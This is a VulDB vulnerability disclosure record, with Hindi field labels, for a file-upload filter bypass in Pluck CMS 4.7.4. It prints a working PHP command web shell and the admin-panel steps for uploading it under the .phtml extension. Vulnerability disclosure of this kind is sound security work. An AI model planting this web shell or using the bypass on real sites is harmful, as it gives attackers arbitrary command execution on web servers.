| शीर्षक | Pluck CMS 4.7.4 Shell Upload Filter Bypass |
|---|
| विवरण | From the admin interface choose:
Pages -> Manage Files
Create the following simple command shell and name it simple-backdoor.phtml
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
The .phtml (executable extension) defeats the “blacklist” approach taken in this app in regards to allowable file extensions. Which is searching for ‘php’ as the last 3 characters i.e the extension. PHTML along w/ php2..php3 and so on defeated this filter. You get a shell in the context of the web server. |
|---|
| स्रोत | ⚠️ https://github.com/pluck-cms |
|---|
| उपयोगकर्ता | s7acktrac3 (UID 865) |
|---|
| सबमिशन | 25/05/2018 01:22 PM (8 साल पहले) |
|---|
| संयम | 25/05/2018 05:32 PM (4 hours later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 118203 [Pluck 4.7.4 Manage Files Page अधिकार वृद्धि] |
|---|
| अंक | 17 |
|---|